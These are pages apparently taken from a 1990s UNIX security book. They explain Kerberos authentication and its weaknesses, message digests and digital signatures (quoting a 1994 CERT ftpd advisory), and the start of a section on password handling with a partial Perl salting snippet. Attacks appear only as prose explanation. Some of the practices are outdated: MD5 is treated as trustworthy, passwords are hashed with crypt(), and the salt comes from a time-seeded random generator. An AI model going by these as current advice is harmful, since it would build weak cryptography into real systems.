current time, it then creates a ticket granting ticket, encrypts it with your password, and sends to you.[17]<br />

[17] Why the change in protocol between Kerberos 4 and Kerberos 5? Under Kerberos 4,<br />

the objective of the designer was to minimize the amount of time that the user's password<br />

was stored on the workstation. Unfortunately, this made Kerberos 4 susceptible to offline<br />

password-guessing attacks. An attacker could simply ask a Kerberos Authentication Server<br />

for a ticket granting ticket for a particular user, then try to decrypt that ticket with every<br />

word in the dictionary. With Kerberos 5, the workstation must demonstrate to the Kerberos<br />

Authentication Server that the user knows the correct password. This is a more secure<br />

system, although the user's encrypted ticket granting ticket can still be intercepted as it is<br />

sent from the server to the workstation by an attacker and attacked with an exhaustive key<br />

search.<br />

Figure 19.3 shows a schematic of the initial Kerberos authentication.<br />

Figure 19.3: Initial Kerberos authentication<br />

What is this ticket granting ticket? It is a block of data that contains two pieces of information:<br />

●<br />

●<br />

The session key: Kses<br />

A ticket for the Kerberos Ticket Granting Service, encrypted with both the session key and the<br />

Ticket Granting Service's key: EKtgsEKses{Ttgs}<br />

The user's workstation can now contact the Kerberos Ticket Granting Service to obtain tickets for any<br />

principal within the Kerberos realm - that is, the set of servers and users who are known to the Kerberos<br />

Server.<br />

Note that:<br />

●<br />

Passwords are stored on the Kerberos Server, not on the individual workstations.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (3 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

●<br />

●<br />

●<br />

●<br />

The user's password is never transmitted on the network--encrypted or otherwise.<br />

The Kerberos Authentication Server is able to authenticate the user's identity, because the user<br />

knows the user's password.<br />

The user is able to authenticate the Kerberos Server's identity, because the Kerberos<br />

Authentication Server knows the user's password.<br />

An eavesdropper who intercepts the ticket sent to you from the Kerberos Server will get no benefit<br />

from the message, because it is encrypted using a key (your password) that the eavesdropper<br />

doesn't know. Likewise, an eavesdropper who intercepts the ticket sent from the Kerberos Server<br />

to the Ticket Granting Service will not be able to make use of the ticket because it is encrypted<br />

with the Ticket Granting Service's password.<br />

19.6.1.2 Using the ticket granting ticket<br />

Once you have obtained a ticket granting ticket, you are likely to want to do something that requires the<br />

use of an authenticated service. For example, you probably want to read the files in your home directory.<br />

Under Sun Microsystems' regular version of NFS, once a file server exports its filesystem to a<br />

workstation, the server implicitly trusts whatever the workstation wants to do. If georgeis logged into the<br />

workstation, the server lets george access the files in his home directory. But if george becomes the<br />

superuser on his workstation, changes his UID to be that of bill, and starts accessing bill's files, the<br />

vanilla NFS server has no mechanism to detect this charlatanry or take evasive action.<br />

The scenario is very different when the NFS has been modified to use Kerberos.<br />

When the user first tries to access his files from a Kerberos workstation, system software on the<br />

workstation contacts the Ticket Granting Service and asks for a ticket for the File Server Service. The<br />

Ticket Granting Service sends the user back a ticket for the File Server Service, This ticket contains<br />

another ticket, encrypted with the File Server Service's password, that the user's workstation can present<br />

to the File Server Service to request files. The contained ticket includes the user's authenticated name, the<br />

expiration time, and the <strong>Internet</strong> address of the user's workstation. The user's workstation then presents<br />

this ticket to the File Server Service. The File Server Service decrypts the ticket using its own password,<br />

then builds a mapping between the (UID,IP address) of the user's workstation and a UID on the file<br />

server.<br />

As before, all of the requests and tickets exchanged between the workstation and the Ticket Granting<br />

Service are encrypted, protecting them from eavesdroppers.<br />

Figure 19.4: Workstation/file server/TGS communication<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (4 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

The Ticket Granting Service was able to establish the user's identity when the user asked for a ticket for<br />

the File Service, because:<br />

●<br />

●<br />

●<br />

The user's File Service Ticket request was encrypted using the session key, Ktgs<br />

The only way the user could have learned the session key was by decrypting the original Ticket<br />

Granting Ticket that the user received from the Kerberos Authentication Server.<br />

To decrypt that original ticket, the user's workstation had to know the user's password. (Note again<br />

that this password was never transmitted over the network.)<br />

The File Server Service was able to establish the user's identity because:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

The ticket that it receives requesting service from the user is encrypted with the File Server<br />

Service's own key.<br />

Inside that ticket is the IP address and username of the user.<br />

The only way for that information to have gotten inside the ticket was for the Ticket Granting<br />

Service to have put it there.<br />

Therefore, the Ticket Granting Service is sure of the user's identity.<br />

And that's good enough for the File Server Service.<br />

After authentication takes place, the workstation uses the network service as usual.<br />

NOTE: Kerberos puts the time of day in the request to prevent an eavesdropper from<br />

intercepting the Request For Service request and retransmitting it from the same host at a<br />

later time. This sort of attack is called a playback or replay attack.<br />

19.6.1.3 Authentication, data integrity, and secrecy<br />

Kerberos is a general-purpose system for sharing secret keys between principals on the network.<br />

Normally, Kerberos is used solely for authentication. However, the ability to exchange keys can also be<br />

used to ensure data integrity and secrecy.<br />

If eavesdropping is an ongoing concern, all information transmitted between the workstation and the<br />

service can be encrypted using a key that is exchanged between the two principals. Unfortunately,<br />

encryption carries a performance penalty. At MIT's Project Athena, encryption is used for transmitting<br />

highly sensitive information such as passwords, but is not used for most data transfer, such as files and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (5 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

electronic mail.<br />

NOTE: For single-user workstations, Kerberos provides significant additional security<br />

beyond that of regular passwords. If two people are logged into the workstation at the same<br />

time, then the workstation will be authenticated for both users. These users can then pose as<br />

each other. This threat is so significant that at MIT's Project Athena, network services such<br />

as rlogind and telnetd are disabled on workstations to prevent an attacker from logging in<br />

while a legitimate user is authenticated. It is also possible for someone to subvert the local<br />

software to capture the user's password as it is typed (as with a regular system).<br />

In early 1996, graduate students with the COAST Laboratory at Purdue University discovered a<br />

long-standing weakness in the key generation for Kerberos 4. The weakness allows an attacker to guess<br />

session keys in a matter of seconds. A patch has been widely distributed; be sure to install it if you are<br />

using Kerberos 4.<br />

19.6.1.4 Kerberos 4 vs. Kerberos 5<br />

Kerberos has gone through 5 major revisions during its history to date. Currently, as we've mentioned,<br />

there are two versions of Kerberos in use in the marketplace.<br />

Kerberos 4 is more efficient than Kerberos 5, but more limited. For example, Kerberos 4 can only work<br />

over TCP/IP networks. Kerberos 4 has a large installed base, but there is increasing support for Kerberos<br />

5.<br />

Kerberos 5 fixes minor problems with the Kerberos protocol, making it more resistant to determined<br />

attacks over the network. Kerberos 5 is also more flexible: it can work with different kinds of networks.<br />

Kerberos 5 also has provisions for working with encryption schemes other than DES, although there are<br />

(as of this writing) no implementations that use alternative encryption algorithms.<br />

Finally, Kerberos 5 supports delegation of authentication, ticket expirations longer than 21 hours,<br />

renewable tickets, tickets that will work sometime in the future, and many more options.<br />

19.6.2 Kerberos vs. <strong>Sec</strong>ure RPC<br />

Kerberos is an authentication system, not an RPC system. Kerberos can be used with a variety of RPC<br />

schemes: versions of Kerberos are available for Sun RPC and for the X Window System (which has its<br />

own RPC specifically designed for network window systems). But Kerberos can also be used simply for<br />

exchanging keys. For example, there is a version of the telnet command that uses Kerberos to exchange a<br />

cryptographic key. MIT also modified the NFS protocol to work with Kerberos; the modification was a<br />

simple kernel patch to the NFS server that maintained a mapping between authenticated users on discrete<br />

hosts and UIDS on the NFS server.<br />

There are other important differences between Kerberos and <strong>Sec</strong>ure RPC:<br />

●<br />

<strong>Sec</strong>ure RPC passwords are based on public key cryptography, not secret key cryptography. When<br />

the user wishes to prove her identity to the NIS server, she encrypts an authenticator and sends it to<br />

the <strong>Sec</strong>ure RPC server, which then decrypts her authenticator using the user's widely available<br />

public key. With Kerberos, identity is provided by knowing the secret key.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (6 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

●<br />

●<br />

<strong>Sec</strong>ure RPC stores both the user's secret key and public key on the NIS server. The secret key is<br />

encrypted with the user's password and made available to the network, but the network does not<br />

have the ability to decrypt it. Thus, with <strong>Sec</strong>ure RPC, there is no need for a specially secured<br />

"authentication server" to establish the identity of users on the network.<br />

<strong>Sec</strong>ure RPC is built into Sun's RPC system. While Kerberos requires that each application be<br />

specifically tailored. <strong>Sec</strong>ure RPC is a transparent modification to Sun's low-level RPC that works<br />

with any RPC-based service. Any application can use it simply by requesting AUTH_DES<br />

authentication.[18]<br />

[18] If you are using recent versions of Sun's Solaris operating system, you can<br />

specify Kerberos authentication by requesting AUTH_KERB.<br />

Kerberos is an add-on system that can be used with any existing network protocol. Project Athena uses<br />

Kerberos with NFS, remote login, password changing, and electronic mail. Sun Microsystems has added<br />

compatibility with Kerberos to its RPC system. Other software vendors, including the Open Software<br />

Foundation and IBM, have used the ideas pioneered by Kerberos as the basis of their own network<br />

security offerings.<br />

19.6.3 Installing Kerberos<br />

Installing Kerberos is a complicated process that depends on the version of Kerberos you have, the kind<br />

of computer, and the version of your computer's operating system. It's a difficult task that requires that<br />

you either have the source code for your computer system, or that you have source code for replacement<br />

programs. It is not a task to be undertaken lightly.<br />

Fortunately, increasingly you don't have to. Kerberos or Kerberos-like security systems are now available<br />

from several companies, as well as being a standard part of several operating systems. These days, there<br />

is no reason to be running anything but secure network services.<br />

The Kerberos source code is available for the cost of reproduction from MIT; the address and ordering<br />

information are provided in Appendix E, Electronic Resources. Alternatively, you may use FTP to<br />

transfer the files over the <strong>Internet</strong> from the computer athena-dist.mit.edu.[19]<br />

[19] Because of export restrictions, only U.S. and Canadian citizens may do so legally.<br />

As the changes required to your system's software are substantial and subject to change, the actual<br />

installation process will not be described here. See the documentation provided with Kerberos for details.<br />

19.6.4 Using Kerberos<br />

Using a workstation equipped with Kerberos is only slightly different from using an ordinary<br />

workstation. In the Project Athena environment, all of the special Kerberos housekeeping functions are<br />

performed automatically: when the user logs in, the password typed is used to acquire a Kerberos ticket,<br />

which in turn grants access to the services on the network. Additional tickets are automatically requested<br />

as they are needed. Tickets for services are automatically cached in the /tmp directory. All of a user's<br />

tickets are automatically destroyed when the user logs out.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (7 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

But Kerberos isn't entirely transparent. If you are logged into a Kerberos workstation for more than eight<br />

hours, something odd happens: network services suddenly stop working properly. The reason for this is<br />

that tickets issued by Kerberos expire after eight hours, a technique designed to prevent a "replay" attack.<br />

(In such an attack: somebody capturing one of your tickets would then sit down at your workstation after<br />

you leave, using the captured ticket to gain access to your files.) Thus, after eight hours, you must run the<br />

kinit program, and provide your username and password for a second time, to be issued a new ticket for<br />

the Kerberos Ticket Granting Service.<br />

19.6.5 Kerberos Limitations<br />

Although Kerberos is an excellent solution to a difficult problem, it has several shortcomings:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Every network service must be individually modified for use with Kerberos. Because of the<br />

Kerberos design, every program that uses Kerberos must be modified. The process of performing<br />

these modifications is often called "Kerberizing" the application. The amount of work that this<br />

entails depends entirely on the application program. Of course, to Kerberize an application, you<br />

must have the application's source code.<br />

Kerberos doesn't work well in a time-sharing environment. Kerberos is designed for an<br />

environment in which there is one user per workstation. Because of the difficulty of sharing data<br />

between different processes running on the same <strong>UNIX</strong> computer, Kerberos keeps tickets in the<br />

/tmp directory. If a user is sharing the computer with several other people, it is possible that the<br />

user's tickets can be stolen, that is, copied by an attacker. Stolen tickets can then be used to obtain<br />

fraudulent service.<br />

Kerberos requires a secure Kerberos Server. By design, Kerberos requires that there be a secure<br />

central server that maintains the master password database. To ensure security, a site should use<br />

the Kerberos Server for absolutely nothing beyond running the Kerberos Server program. The<br />

Kerberos Server must be kept under lock and key, in a physically secure area. In some<br />

environments, maintaining such a server is an administrative and/or financial burden.<br />

Kerberos requires a continuously available Kerberos Server. If the Kerberos Server goes<br />

down, the Kerberos network is unusable.<br />

Kerberos stores all passwords encrypted with a single key. Adding to the difficulty of running<br />

a secure server is the fact that the Kerberos Server stores all passwords encrypted with the server's<br />

master key, which happens to be located on the same hard disk as the encrypted passwords. This<br />

means that, in the event the Kerberos Server is compromised, all user passwords must be changed.<br />

Kerberos does not protect against modifications to system software ( Trojan horses).<br />

Kerberos does not have the computer authenticate itself to the user - that is, there is no way for a<br />

user sitting at a computer to determine whether the computer has been compromised. This failing<br />

is easily exploited by a knowledgeable attacker.[20]<br />

[20] In fact, Trojan horses were a continuing problem at MIT's Project Athena.<br />

An intruder, for example, can modify the workstation's system software so every<br />

username/password combination typed is recorded automatically or sent electronically to another<br />

machine controlled by the attacker. Alternatively, a malicious attacker can simply modify the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (8 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

●<br />

workstation's software to spuriously delete the user's files after the user has logged in and<br />

authenticated himself to the File Server Service. Both of these problems are consequences of the<br />

fact that, even in a networked environment, many workstations (including Project Athena's)<br />

contain local copies of the programs that they run.<br />

Kerberos may result in a cascading loss of trust. Another problem with Kerberos is that if a<br />

server password or a user password is broken or otherwise disclosed, it is possible for an<br />

eavesdropper to use that password to decrypt other tickets and use this information to spoof servers<br />

and users.<br />

Kerberos is a workable system for network security, and it is still widely used. But more importantly, the<br />

principles behind Kerberos are increasingly available in network security systems that are available<br />

directly from vendors.<br />

19.5 Sun's NIS+ 19.7 Other Network<br />

Authentication Systems<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (9 of 9) [2002-04-12 10:44:58]


[Chapter 6] 6.5 Message Digests and Digital Signatures<br />

Chapter 6<br />

Cryptography<br />

6.5 Message Digests and Digital Signatures<br />

A message digest (also known as a cryptographic checksum or cryptographic hashcode) is nothing more than a<br />

number - a special number that is effectively a hashcode produced by a function that is very difficult to reverse.<br />

A digital signature is (most often) a message digest encrypted with someone's private key to certify the contents. This<br />

process of encryption is called signing. Digital signatures can perform two different functions, both very important to<br />

the security of your system:<br />

●<br />

●<br />

Integrity - A digital signature indicates whether a file or a message has been modified.<br />

Authentication - A digital signature makes possible mathematically verifying the name of the person who<br />

signed the message.<br />

A third function that is quite valuable in some contexts is called non-repudiation. Non-repudiation means that after<br />

you have signed and sent a message, you cannot later claim that you did not sign the original message. You cannot<br />

repudiate your signature, because the message was signed with your private key (which, presumably, no one else has).<br />

We'll outline the first two of these concepts here, and refer to them in later chapters (and especially in Chapter 9,<br />

Integrity Management). Non-repudiation is not of major concern to us here, although it is important in many other<br />

contexts, especially that of email.<br />

6.5.1 Message Digests<br />

A simple hash function takes some input, usually of indefinite length, and produces a small number that is<br />

significantly shorter than the input. The function is many to one, in that many (possibly infinite) inputs may generate<br />

the same output value. The function is also deterministic in that the same output value is always generated for<br />

identical inputs. Hash functions are often used in mechanisms that require fast lookup for various inputs, such as<br />

symbol tables in compilers and spelling checkers.<br />

A message digest is also a hash function. It takes a variable length input - often an entire disk file - and reduces it to a<br />

small value (typically 128 to 512 bits). Give it the same input, and it always produces the same output. And, because<br />

the output is very much smaller than the potential input, for at least one of the output values there must be more than<br />

one input value that can produce it; we would expect that to be true for all possible output values for a good message<br />

digest algorithm.<br />

There are two other important properties of good message digest algorithms. The first is that the algorithm cannot be<br />

predicted or reversed. That is, given a particular output value, we cannot come up with an input to the algorithm that<br />

will produce that output, either by trying to find an inverse to the algorithm, or by somehow predicting the nature of<br />

the input required. With at least 128 bits of output, a brute force attack is pretty much out of the question, as there will<br />

be 1.7 x 10 38 possible input values of the same length to try, on average, before finding one that generates the correct<br />

output. Compare this with some of the figures given in "Strength of RSA" earlier in this chapter, and you'll see that<br />

this task is beyond anything anyone would be able to try with current technology. With numbers as large as these, the<br />

idea that any two different documents produced at random during the course of human history would have the same<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_05.htm (1 of 6) [2002-04-12 10:44:59]


[Chapter 6] 6.5 Message Digests and Digital Signatures<br />

128-bit message digest is unlikely!<br />

The second useful property of message digest algorithms is that a small change in the input results in a significant<br />

change in the output. Change a single input bit, and roughly half of the output bits should change. This is actually a<br />

consequence of the first property, because we don't want the output to be predictable based on the input. However, this<br />

aspect is a valuable property of the message digest all by itself.<br />

6.5.2 Using Message Digests<br />

Given the way that a message digest works, you can understand how it can be used as an authentication system for<br />

anyone who is distributing digital documents: simply publish your documents electronically, distribute them on the<br />

<strong>Internet</strong>, and for each document also publish its message digest. Then, if you want to be sure that the copy of the<br />

document you download from the <strong>Internet</strong> is an unaltered copy of the original, simply recalculate the document's<br />

message digest and compare it with the one for the document that you published. If they match, you know you've got<br />

the same document as the original.<br />

In fact, the Computer Emergency Response Team (CERT) does this via the <strong>Internet</strong> when they distribute patches and<br />

bug fixes for security-related problems. The following is a portion of a 1994 message from CERT advising recipients<br />

to replace the FTPprograms on their computers with more secure versions:<br />

Date: Thu, 14 Apr 94 16:00:00 EDT<br />

Subject: CERT Advisory CA-94:08.ftpd.vulnerabilities<br />

To: cert-advisory-request@cert.org<br />

From: cert-advisory@cert.org (CERT Advisory)<br />

Organization: CERT Coordination Center<br />

Address: Software Engineering Institute<br />

Carnegie Mellon University<br />

Pittsburgh, Pennsylvania 15213-3890<br />

=======================================================================<br />

CA-94:08 CERT Advisory<br />

April 14, 1994<br />

ftpd Vulnerabilities<br />

-----------------------------------------------------------------------<br />

The CERT Coordination Center has received information concerning two<br />

vulnerabilities in some ftpd implementations. The first is a<br />

vulnerability with the SITE EXEC command feature of the FTP daemon<br />

(ftpd) found in versions of ftpd that support the SITE EXEC feature.<br />

This vulnerability allows local or remote users to gain root access.<br />

The second vulnerability involves a race condition found in the ftpd<br />

implementations listed in <strong>Sec</strong>tion I. below. This vulnerability allows<br />

local users to gain root access.<br />

Sites using these implementations are vulnerable even if they do not<br />

support anonymous FTP.<br />

II. Impact<br />

Anyone (remote or local) can gain root access on a host running a<br />

vulnerable FTP daemon. Support for anonymous FTP is not required<br />

to exploit this vulnerability.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_05.htm (2 of 6) [2002-04-12 10:44:59]<br />

. . .


[Chapter 6] 6.5 Message Digests and Digital Signatures<br />

III. Solution<br />

Affected sites can solve both of these problems by upgrading to<br />

the latest version of ftpd. These versions are listed below. Be<br />

certain to verify the checksum information to confirm that you<br />

have retrieved a valid copy.<br />

If you cannot install the new version in a timely manner, you<br />

should disable FTP service until you have corrected this problem.<br />

It is not sufficient to disable anonymous FTP. You must disable<br />

the FTP daemon.<br />

For wuarchive ftpd, you can obtain version 2.4 via anonymous<br />

FTP from wuarchive.wustl.edu, in the "/packages/wuarchive-ftpd"<br />

directory. If you are currently running version 2.3, a patch<br />

file is available.<br />

BSD SVR4<br />

File Checksum Checksum MD5 Digital Signature<br />

----------------- -------- --------- ----------------------------wu-ftpd2.4.tar.Z<br />

38213 181 20337 362 cdcb237b71082fa23706429134d8c32e<br />

patch_2.3-2.4.Z 09291 8 51092 16 5558a04d9da7cdb1113b158aff89be8f<br />

. . .<br />

As you can tell from the tone of the message, CERT considers the security problem to be extremely serious: anyone<br />

on the <strong>Internet</strong> could break into a computer running a particular ftpd program and become the superuser! CERT had a<br />

fix for this bug but rather than distribute it to each site individually, they identified a principal site with the fix<br />

(wuarchive.wustl.edu) and advised people to download the fix.<br />

MD5 is a commonly used message-digest algorithm. CERT publishes the MD5 "digital signature" of the files so that<br />

people can verify the authenticity of the patch before they install it. After receiving the message from CERT and<br />

downloading the patch, system administrators are supposed to compute the MD5 of the binary. This process provides<br />

two indications.<br />

1.<br />

2.<br />

If the MD5 of the binary matches the one published in the CERT message, a system administrator knows the<br />

file wasn't damaged during the download.<br />

More importantly, if the two MD5 codes match, a system administrator can be certain that hackers haven't<br />

broken into the computer wuarchive.wustl.edu and replaced the patch with a program that contains security<br />

holes.<br />

Although CERT's interest in security is commendable, there is an important flaw in this approach. Nothing guarantees<br />

that the CERT message itself isn't forged. In other words, any hacker with sufficient skill to break into an anonymous<br />

FTP repository and play switcheroo with the binaries might also be able to send a forged email message to CERT's<br />

mailing lists telling system administrators to install new (and faulty) software. Unsuspecting administrators would<br />

receive the email message, download the patch, check the MD5 codes, and install the software - creating a new<br />

security hole for the hackers to exploit.<br />

CERT's problem, then, is this: while the MD5 code in the email message is a signature for the patch, there is no<br />

signature for the message from CERT itself! There is no way to verify that the CERT message is authentic.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_05.htm (3 of 6) [2002-04-12 10:44:59]


[Chapter 6] 6.5 Message Digests and Digital Signatures<br />

CERT personnel are aware of the problem that alerts can be forged. For this reason, CERT uses digital signatures for<br />

all its alerts available via anonymous FTP from the computer ftp.cert.org. For each alert, you find a file with an .asc<br />

file extension, which contains a digital signature. Unfortunately, CERT (at this time) does not distribute its alerts with<br />

the digital signature at the bottom of the message, which would make things easier for everybody.<br />

6.5.3 Digital Signatures<br />

As we pointed out in the last section, a message digest function is only half of the solution to creating a reliable digital<br />

signature. The other half is public key encryption - only run in reverse.<br />

Recall that when we introduced public key encryption earlier in this chapter, we said that it depends on two keys:<br />

Public key<br />

A key that is used for encrypting a secret message. Normally, the public key is widely published.<br />

<strong>Sec</strong>ret key<br />

A key that is kept secret, for decrypting messages once they are received.<br />

By using a little bit of mathematical gymnastics, you can run the public key algorithm in reverse. That is, you could<br />

encrypt messages with your secret key; these messages can then be decrypted by anyone who possesses your public<br />

key. Why would anyone want to do this? Each public key has one and only one matching secret key. If a particular<br />

public key can decrypt a message, you can be sure that the matching secret key was used to encrypt it. And that is how<br />

digital signatures work.<br />

When you apply your secret key to a message, you are signing it. By using your secret key and the message digest<br />

function, you are able to calculate a digital signature for the message you're sending. In principle, a public key<br />

algorithm could be used without a message digest algorithm: we could encrypt the whole message with our private<br />

key. However, every public key algorithm in use requires a large amount of processor time to encrypt even<br />

moderate-size inputs. Thus, to sign a multi-megabyte file might take hours or days if we only used the public key<br />

encryption algorithm.<br />

Instead, we use a fast message digest algorithm to calculate a hash value, and then we sign that small hash value with<br />

our secret key. When you, the recipient, get that small value, you can decrypt the hash value using our public key. You<br />

can also recreate the hash value from the input. If those two values match, you are assured that you got the same file<br />

we signed.<br />

The most common digital signature in use today is the combination of the MD5 message digest algorithm and the<br />

RSA public key encryption mechanism. Another likely possibility is to use the SHA (<strong>Sec</strong>ure Hash Algorithm) and<br />

ElGamal public-key mechanism; together, these two algorithms form the NIST DSA - Digital Signature Algorithm.<br />

6.5.4 Common Digest Algorithms<br />

There are many message-digest functions available today. All of them work in roughly the same way, but they differ<br />

in speed and specific features. Details of these functions may be found in the references in Appendix D.<br />

6.5.4.1 MD2, MD4, and MD5<br />

One of the most widely used message digest functions is the MD5 function, which was developed by Ronald Rivest, is<br />

distributed by RSA Data <strong>Sec</strong>urity, and may be used freely without license costs. It is based on the MD4 algorithm,<br />

which in turn was based on the MD2 algorithm.<br />

The MD2, MD4, and MD5 message digest functions all produce a 128-bit number from a block of text of any length.<br />

Each of them pads the text to a fixed-block size, and then each performs a series of mathematical operations on<br />

successive blocks of the input.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_05.htm (4 of 6) [2002-04-12 10:44:59]


[Chapter 6] 6.5 Message Digests and Digital Signatures<br />

MD2 was designed by Ronald Rivest and published in RFC 1319. There are no known weaknesses in it, but it is very<br />

slow. To create a faster message-digest, Rivest developed MD4, which was published in <strong>Internet</strong> RFCS 1186 and<br />

1320. The MD4 algorithm was designed to be fast, compact, and optimized for machines with "little-endian"<br />

architectures.<br />

Some potential attacks against MD4 were published in the cryptographic literature, so Dr. Rivest developed the MD5<br />

algorithm, published in RFC 1321.[21] It was largely a redesign of MD4, and includes one more round of internal<br />

operations and several significant algorithmic changes. Because of the changes, MD5 is somewhat slower than MD4.<br />

However, it is more widely accepted and used than the MD4 algorithm.<br />

[21] <strong>Internet</strong> RFCs are a form of open standards documents. They can be downloaded or mailed, and they<br />

describe a common set of protocols and data structures for interpretability.<br />

As of early 1996, significant flaws have been discovered in MD4. As a result, the algorithm should not be used.<br />

6.5.4.2 SHA<br />

The <strong>Sec</strong>ure Hash Algorithm was developed by NIST with some assistance by the NSA. The algorithm appears to be<br />

closely related to the MD4 algorithm, except that it produces an output of 160 bits instead of 128. Analysis of the<br />

algorithm reveals that some of the differences from the MD4 algorithm are similar in purpose to the improvements<br />

added to the MD5 algorithm (although different in nature).<br />

6.5.4.3 HAVAL<br />

The HAVAL algorithm is a modification of the MD5 algorithm, developed by Yuliang Zheng, Josef Pieprzyk, and<br />

Jennifer Seberry. It can be modified to produce output hash values of various lengths, from 92 bits to 256. It also has<br />

an adjustable number of "rounds" (application of the internal algorithm). The result is that HAVAL can be made to<br />

run faster than MD5, although there may be some corresponding decrease in the strength of the output. Alternatively,<br />

HAVAL can be tuned to produce larger and potentially more secure hash codes.[22]<br />

[22] You should note that merely having longer hash values does not necessarily make a message digest<br />

algorithm more secure.<br />

6.5.4.4 SNEFRU<br />

SNEFRU was designed by Ralph Merkle to produce either 128-bit or 256-bit hash codes. The algorithm can also be<br />

run with a variable number of "rounds" of the internal algorithm. However, analysis by several cryptographers has<br />

shown that SNEFRU has weaknesses that can be exploited, and that you can find arbitrary messages that hash to a<br />

given 128-bit value if the 4-round version is used. Dr. Merkle currently recommends that only 8-round SNEFRU be<br />

used, but this algorithm is significantly slower than the MD5 or HAVAL algorithms.<br />

6.5.5 Other Codes<br />

For the sake of completeness, we will describe two other types of "signature" functions.<br />

6.5.5.1 Checksums<br />

A checksum is a function that is calculated over an input to determine if that input has been corrupted. Most often,<br />

checksums are used to verify that data communications over a modem or network link have not undergone "bit-rot," or<br />

random changes from noise. They may also be built into storage controllers to perform checks on data moved to and<br />

from media: if a checksum doesn't agree with the data, then there may be a problem on the disk or tape.<br />

Checksums are usually calculated as simple linear or polynomial functions over their input, and result in small values<br />

(16 or 32 bits). CRC polynomials, or cyclic-redundancy checksums, are a particular form of checksum that are<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_05.htm (5 of 6) [2002-04-12 10:44:59]


[Chapter 6] 6.5 Message Digests and Digital Signatures<br />

commonly used. The sum command in <strong>UNIX</strong> will generate a CRC checksum, although there appear to be at least<br />

three major versions of sum available on modern <strong>UNIX</strong> systems, and they do not generate the same values!<br />

Checksums are easy to calculate, and are simple to fool. You can alter a file in such a way that it has the same simple<br />

checksum as before the alteration. In fact, many "hacker toolkits" circulating in the hacker underground have tools to<br />

recreate sum output for system commands after they have been modified! Thus, checksums should never be used as a<br />

verification against malicious tampering.<br />

6.5.5.2 Message authentication codes<br />

Message Authentication Codes, or MACS [23] are basically message digests with a password thrown in. The intent is<br />

that the MAC cannot be recreated by someone with the same input unless that person also knows the secret key<br />

(password). These may or may not be safer than a simple message digest - depending on the algorithm used, the<br />

strength of the key, and the length of the output MAC.<br />

[23] Not to be confused with the Mandatory Access Control, whose acronym is also MAC.<br />

One simple form of MAC appends the message to the key and then generates a message digest. Because the key is<br />

part of the input, it alters the message digest in a way that can be recreated. Because two keys will generate very<br />

different output for the same data input, we achieve our goal of a password-dependent MAC.<br />

A second form of MAC uses some form of stream encryption method, such as RC4 or DES in CFB mode. The key in<br />

this case is the encryption password, and the MAC is the last block of bits from the encryption algorithm. As the<br />

encryption output depends on all the bits of input and the secret password, the last block of the output will be different<br />

for a different input or a different password. However, if the encryption block size is small (e.g., 64 bits), the MAC<br />

may be more susceptible to brute-force guessing attacks than a larger message digest value would be.<br />

A public key digital signature may be thought of as a MAC, too, as it depends on the message digest output and the<br />

secret key. A change in either will result in a change in the overall value of the function.<br />

6.4 Common Cryptographic<br />

Algorithms<br />

6.6 Encryption Programs<br />

Available for <strong>UNIX</strong><br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_05.htm (6 of 6) [2002-04-12 10:44:59]


[Chapter 23] 23.5 Tips on Using Passwords<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.5 Tips on Using Passwords<br />

Lots of computer programs use passwords for user authentication. Beyond the standard <strong>UNIX</strong> password, users soon find<br />

that they have passwords for special electronic mail accounts, special accounting programs, and even fantasy role-playing<br />

games.<br />

Few users are good at memorizing passwords, and there is a great temptation to use a single password for all uses. This is a<br />

bad idea. Users should be encouraged to not type their login password into some MUD that's running over at the local<br />

university, for example.<br />

As a programmer, there are several steps that you can take in programs that ask for passwords to make the process more<br />

secure:<br />

1.<br />

2.<br />

3.<br />

Don't echo the password as the user types it.<br />

Normally, <strong>UNIX</strong> turns off echo when people type passwords. You can do this yourself by using the getpass()<br />

function. In recent years, however, a trend has evolved to echo asterisks (*) for each character of the password typed.<br />

This provides some help for the person typing the password to see if they have made a mistake in their typing, but it<br />

also enables somebody looking over the user's shoulders to see how many characters are in the password.<br />

When you store the user's password on the computer, encrypt it.<br />

If nothing else, use the crypt() library function. Use random numbers to choose the password's salt. When the user<br />

provides a password, check to see if it is the original password by encrypting the provided password with the same<br />

salt.<br />

For example, the following bit of a simple Perl code takes a password in the $password variable, generates a random<br />

salt, and places an encrypted password in the variable $encrypted_password:<br />

$salts="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./";<br />

srand(time);<br />

local($s1) = rand(64);<br />

